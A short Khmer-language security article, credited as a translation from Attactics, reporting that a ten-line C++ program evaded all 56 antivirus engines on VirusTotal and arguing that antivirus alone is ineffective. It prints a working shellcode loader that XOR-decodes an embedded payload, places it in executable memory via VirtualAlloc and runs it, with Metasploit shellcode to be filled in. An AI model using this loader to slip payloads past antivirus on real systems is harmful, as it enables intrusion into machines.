កូដតែ ១០ បន្ទាត់ប៉ុណ្ណោះ អាចធ្វើឲ្យកម្មវិធីកំចាត់មេរោគ មិនអាចចាប់មេរោគបាន

នាពេលថ្មីៗនេះ អ្នកស្រាវជ្រាវផ្នែកសន្តិសុខព័ត៌មានម្នាក់បាន សរសេរនូវកូដនៅក្នុង C++ ហើយធ្វើតេស្តទៅលើវេបសាយ Virustotal ។ អ្វីដែលគួរឲ្យភ្ញាក់ផ្អើលនោះគឺថា ក្នុងចំណោមកម្មវិធីកំចាត់មេរោគទាំង ៥៦ គឺរកមិនឃើញថាមានបញ្ហា (មេរោគ) ឡើយ។

ខាងក្រោមនេះគឺជាកូដ (តែ ១០បន្ទាត់ប៉ុណ្ណោះ) ហើយដំណើរការចំពោះ Windows platform :

#include
#include
int main(int argc, char **argv) {
char b[] = {/* your XORd with key of ‘x’ shellcode goes here i.e. 0x4C,0x4F, 0x4C */};
char c[sizeof b];
for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ ‘x’;}
void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, c, sizeof c);
((void(*)())exec)();
}

ឧទាហរណ៍ខាងលើនេះ ត្រូវបានធ្វើតេស្តនៅលើវេបសាយ VirusTotal ដែលមិនមានកម្មវិធីណាចាប់បានឡើយ ដែលត្រូវបានសរសេរដោយរួមបញ្ជុលនូវ shellcode ដែលបង្កើតឡើងនៅក្នុង metasploit framework ។

យោបល់

តាមរយៈការធ្វើតេស្តនេះ បានបញ្ជាក់ថាកម្មវិធីកំចាត់មេរោគគឺមិនមានប្រសិទ្ធិភាពឡើយ ហើយអ្នកទាំងអស់គ្នាក៏បានដឹងហើយដែរ។ តែជាការពិតដែលយើងមិន អាចប្រកែកបាននោះគឺ មានអង្គភាពច្រើនជាង ៩៥% នៅតែពឹងផ្អែកទាំងស្រុងទៅលើ antivirus ដើម្បីការពារកុំព្យូទ័រមួយៗ (end-points)។

តើមានវិធីសាស្ត្រណាប្រសើរជាងនេះទេ? វាប្រាកដជាមាន ។ មានក្រុមហ៊ុនអ្នកលក់មួយចំនួន បានបញ្ចេញនូវផលិតផលដែលប្រើវិធីសាស្ត្រក្នុងការការពារកុំព្យូទ័រ (endpoints) ដោយផ្តោតទៅលើការកំណត់អត្តសញ្ញាណនៃចំនុចខ្សោយដែលត្រូវបានស្គាល់ ។ តើនេះគឺជាយុទ្ធសាស្ត្រអាចការពារបានប្រាកដមែនទេ? ខ្ញុំថា មិននោះទេ គឺគ្រាន់តែគ្រាន់បើជាងមុនតែប៉ុណ្ណោះ ។

 

ប្រភព៖ Attactics / ប្រែសម្រួលដោយ៖ SecuDemy.com